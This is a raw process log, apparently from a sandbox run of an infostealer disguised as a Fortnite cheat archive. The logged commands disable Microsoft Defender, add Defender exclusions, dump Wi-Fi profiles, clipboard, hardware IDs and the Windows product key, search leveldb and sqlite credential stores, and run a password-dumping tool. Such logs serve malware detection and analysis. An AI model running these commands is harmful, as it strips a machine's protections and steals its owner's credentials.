"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3884 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5284 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1744 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1304 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6540 /prefetch:8
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2248 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3804 /prefetch:1
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\Fortnite-external-updated-main\Fortnite-external-updated-main\VANTA.rar"
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4244 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6688 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5744 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6244 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2076,17598036297445597150,4528300245926686551,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5968 /prefetch:8
C:\Users\Admin\Downloads\vt.exe
"C:\Users\Admin\Downloads\vt.exe"
C:\Users\Admin\Downloads\vt.exe
"C:\Users\Admin\Downloads\vt.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "net session"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\vt.exe'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Unblock-File '.\vt.exe'
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\getPass'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Unblock-File '.\getPass'
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "where /r . *.sqlite"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\where.exe
where /r . *.sqlite
C:\Windows\system32\tree.com
tree /A /F
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getPass.exe /stext pass.txt"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tree.com
tree /A /F
C:\Users\Admin\AppData\Local\Temp\_MEI42562\getPass.exe
getPass.exe /stext pass.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Users\Admin\Downloads\vt.exe
"C:\Users\Admin\Downloads\vt.exe"
C:\Users\Admin\Downloads\vt.exe
"C:\Users\Admin\Downloads\vt.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "net session"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\vt.exe'"
C:\Windows\system32\net.exe
net session
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Unblock-File '.\vt.exe'
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\getPass'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Unblock-File '.\getPass'
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "where /r . *.sqlite"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\system32\where.exe
where /r . *.sqlite
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getPass.exe /stext pass.txt"
C:\Users\Admin\AppData\Local\Temp\_MEI55522\getPass.exe
getPass.exe /stext pass.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\Desktop\VANTA\x64\Release\GeforceNOW.exe
"C:\Users\Admin\Desktop\VANTA\x64\Release\GeforceNOW.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Users\Admin\Desktop\VANTA\x64\Release\Vanguardmapper.exe
"C:\Users\Admin\Desktop\VANTA\x64\Release\Vanguardmapper.exe"
C:\Users\Admin\Desktop\VANTA\x64\Release\Vanguardmapper.exe
"C:\Users\Admin\Desktop\VANTA\x64\Release\Vanguardmapper.exe"
C:\Users\Admin\Desktop\VANTA\x64\Release\mapper.exe
"C:\Users\Admin\Desktop\VANTA\x64\Release\mapper.exe"
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\Downloads\vt.exe
"C:\Users\Admin\Downloads\vt.exe"
C:\Users\Admin\Downloads\vt.exe
"C:\Users\Admin\Downloads\vt.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "net session"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\vt.exe'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Unblock-File '.\vt.exe'
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\getPass'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Unblock-File '.\getPass'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "where /r . *.sqlite"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"
C:\Windows\system32\where.exe
where /r . *.sqlite
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getPass.exe /stext pass.txt"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Users\Admin\AppData\Local\Temp\_MEI21802\getPass.exe
getPass.exe /stext pass.txt
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x78,0x108,0x7ff9747646f8,0x7ff974764708,0x7ff974764718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
